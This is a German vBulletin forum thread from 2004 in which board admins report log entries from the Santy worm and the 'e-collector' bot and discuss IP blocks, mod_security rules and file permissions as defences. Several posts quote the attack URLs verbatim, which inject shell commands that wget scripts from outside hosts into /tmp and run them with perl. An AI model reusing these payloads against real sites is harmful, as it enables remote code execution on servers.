Komischer link via "lastpost" via www.visualcoders.net/spy.gif

**h75** · 26.12.2004, 06:28

Halloo. Dies ist mir gerade aufgefallen. Schon seit ein paar Stunden gibt s immer wieder aufrufe mit folgender url

Was bitte ist das?

http://halloo.de/t.php?goto=lastpost&t=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zon

Das steht auf der "Wer ist online"-Seite:

IP: 66.98.192.84
Host: hera.jtfhosting.net
User-Agent: LWP::Simple/5.803

Ahja. t.php ist bei mir showthread.php

**Silmarillion** · 26.12.2004, 09:31

Derzeit ist wohl davon auszugehen, dass es sich hierbei um den sog. "Santy-Wurm" handelt, der PHP-Skripte attackiert. (Du wärst dann allerdings wohl einer der ersten vB3-User, die von diesem Wurm betroffen wären. Läuft auf Deinem Server zufällig noch ein phpBB?)

Hier mal der letzte heise.de-Artikel: Klick

mfg

**Silmarillion** · 26.12.2004, 09:38

btw - ich habe gerade mal bei mir nachgeschaut. Auch hier ist eine Suchmaschine mit dem Namen "e-collector" aktiv, die sich überwiegend auf die "Druckversionen" zu fixieren scheint:

69.44.60.171
LWP::Simple/5.803

64.106.233.70
LWP::Simple/5.65

203.194.204.253
lwp-trivial/1.41

Wollen wir mal hoffen, dass das vB3 sicher bleibt.

EDIT: das hiesge vb-germany Board wird auch gerade von einem "e-collector"-Schwarm heimgesucht.

EDIT2: sehe gerade, dass das Thema "e-collector" schon angeschrieben wurde: Klick

mfg

**vectra-a-x.de** · 26.12.2004, 11:30

Bei mir ist er auch unterwegs

216.251.35.164
LWP::Simple/5.53

Könnte man ihn nicht per robots.txt ausschliessen ?

Edit: naklar steht doch in den obigen Links - auf robots.txt bezogen !!!

**Mystics** · 26.12.2004, 18:10

E-Collector scheint sich aber nicht wirklich um unsere robots.txt zu scheren.

**h75** · 26.12.2004, 19:14

Ich hab schon wieder einen, aber diesmal nen anderen Link:

http://halloo.de/t.php?goto=http://midomain.false.ca/~pillar/.zk/php.gif?&cmd=cd%20/tmp;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5

Ne ein phpbb hab ich nicht. Sowas kommt mir auch nicht auf den Space. Und ich hab alle PHP-Dateien mit den Rechten 0644. Hab ich erst gestern überprüft.

**h75** · 26.12.2004, 21:01

und gleich noch einen :

http://halloo.de/t.php?goto=newpost&t=349/./s.php?amp;do=finduser&u=http://midomain.false.ca/~pillar/.zk/php.gif?&cmd=cd%20/tmp;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%20midomain.fal

http://halloo.de/t.php?goto=newpost&t=349/./k.php?amp;do=sendtofriend&t=http://midomain.false.ca/~pillar/.zk/php.gif?&cmd=cd%20/tmp;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%20midomain

Habe jetzt die IPs vom e-collector gesperrt:

Diese habe ich bisher:
64.246.28.101
62.141.48.42
62.2.78.25
81.169.157.115
216.251.35.158
66.98.154.77
216.251.35.159

**simplex** · 26.12.2004, 21:04

Tausend dank für den Hinweis. Ich hab noch ein jahrealtes unsicheres zweit-board, das kein vb ist. Bitte weitere verdächtige Aufrufe auch posten, damit ich mod_security geeignet einrichten kann.

**h75** · 26.12.2004, 22:25

http://halloo.de/t.php?goto=newpost&t=337/./misc.php?amp;do=http://midomain.false.ca/~pillar/.zk/php.gif?&cmd=cd%20/tmp;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%20midomain.false.ca/~pilla

und gleich noch einer

**vectra-a-x.de** · 26.12.2004, 22:36

Per IP Sperren im ACP wäre ja sicherlich eine Lösung, aber dabei muss
man ja stehts darauf lauern was bzw. welche IP der E-Collector benutzt.

Wäre es nicht eine Variable den User-Agent mit in die Option
ACP (Gesperrte IP-Adressen) mit zu übernehmen ?

So bräuchte man nur den jeweiligen User-Agenten einzutragen !?!

**simplex** · 26.12.2004, 22:41

Ein paar Gedanken:
Der obige Angriff funktioniert nur, wenn der Inhalt der entsprechenden Variablen als shell-Befehl eingesezt wird. In php sind dazu die in der php.ini sperrbaren Funktionen "exec" und "system" sowie der back-tick-operator nötig. Die Gefahr sollte also begrenzt sein.

Trotz allem: Die zusätzliche Serverlast + Trafficaufkommen stören -- da anscheinend wirklich jede Variable ausgetestet wird, kommt da eine Menge zusammen. Deshalb der Rat: Wenn dein Apache mod_security benutzt, kannst du Abfragen, die "wget" enthalten, sperren.

**Silmarillion** · 26.12.2004, 22:41

Zitat von h75

Und ich hab alle PHP-Dateien mit den Rechten 0644. Hab ich erst gestern überprüft.

Wie genau bist Du denn vorgegangen? Hast Du eine htaccess (wie von vB empfohlen) mit folgendem Inhalt angelegt?

PHP-Code:


cd /pfad/zu/ihrem/vbulletin

chmod -R 644 *.php

chmod -R 644 *.htm

chmod -R 644 *.asp

chmod -R 644 *.shtm

chmod -R 644 *.jsp

chmod -R 644 *.phtm

mfg

**simplex** · 26.12.2004, 22:53

Zitat von Silmarillion

Wie genau bist Du denn vorgegangen? Hast Du eine htaccess (wie von vB empfohlen) mit folgendem Inhalt angelegt?

PHP-Code:


cd /pfad/zu/ihrem/vbulletin

chmod -R 644 *.php

chmod -R 644 *.htm

chmod -R 644 *.asp

chmod -R 644 *.shtm

chmod -R 644 *.jsp

chmod -R 644 *.phtm

mfg

Also das sollte nicht etwa in eine .htaccess-Datei, sondern in der shell nach einem ssh-login eingegeben werden. Allerdings gilt hier die Anmerkung, dass (trotz des Parameters -R !) hiermit nur die Dateirechte des Hauptverzeichnisses deines vBs geändert werden. Und natürlich nützt das auch nur dann etwas, wenn die Dateien nicht dem User des Apache gehören (was wohl nur deshalb nicht erwähnt wurde, weil es als selbstverständlich gilt).

**Rüdiger** · 26.12.2004, 22:58

Also mich erinnert der e-collector an den jeteye-- der war auch lästig wie einen Sch*****fliege-- den hab ich via .htaccess ausgesperrt

**vectra-a-x.de** · 26.12.2004, 23:11

Habe hier nochwas zum Thema Santy-Wurm hackt php-Boards

**Metro Man** · 26.12.2004, 23:30

Zitat von vectra-a-x.de

Habe hier nochwas zum Thema Santy-Wurm hackt php-Boards

solangsam kann mans nicht mehr lesen gibt es nicht genug andere möglichkeiten sich zu beschäftigen als so nen misst zu basteln echt ätzend

**h75** · 27.12.2004, 00:47

Zitat von Silmarillion

Wie genau bist Du denn vorgegangen? Hast Du eine htaccess (wie von vB empfohlen) mit folgendem Inhalt angelegt?mfg

Ich habe mich via SSH eingeloggt, und mit Rechter Maustaste auf den Ordner die Eigenschaft "chmod" augewählt und dort dann nur nachgeschaut, ob die Rechte für die jeweiligen Dateitypen stimmen. Ich muss dazu sagen, das ich die Ordner auf dem Linux-Server im Windows.Stil angezeigt bekomme. Sie Pic im Anhang

Ps ich nutze WinSCP in Verbindung mit Putty. Putty benutze ich aber äusserst selten. Und ein Passwort gebe ich auch nicth mehr ein, weder in WinSCP noch in Putty, da ich mir einen Private Key angelegt habe.

http://www.schlittermann.de/ssh

http://vbg.halloo.de/89868.jpg